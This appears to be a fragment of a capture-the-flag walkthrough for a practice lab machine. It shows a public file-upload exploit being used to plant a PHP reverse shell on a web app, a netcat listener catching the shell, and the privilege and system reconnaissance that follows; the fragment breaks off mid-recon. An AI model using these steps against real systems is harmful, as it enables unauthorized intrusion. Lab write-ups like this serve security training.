3 :80
Using https://github.com/ssMMiles/gym-management-unrestricted-upload
$ cp /opt/php-reverse-shell/src/php_reverse_shell.php shell.php
$ python exploit.py -t 10.10.10.198:8080 -f shell.php
Uploading shell.php to 10.10.10.198:8080/up.php...
You can now access this file at http://10.10.10.198:8080/shell.php !
$ rlwrap nc -lvnp 6969
listening on [any] 6969 ...
Microsoft Windows [Version 10.0.17134.1610]
(c) 2018 Microsoft Corporation. All rights reserved.
whoami
buff\shaun
whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ==================================== ========
SeShutdownPrivilege Shut down the system Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeUndockPrivilege Remove computer from docking station Disabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
SeTimeZonePrivilege Change the time zone Disabled
systeminfo
Host Name: BUFF
OS Name: Microsoft Windows 10 Enterprise
OS Version: 10.0.17134 N/A Build 17134
System Type: x64-based PC
Hotfix(s): N/A
Last updated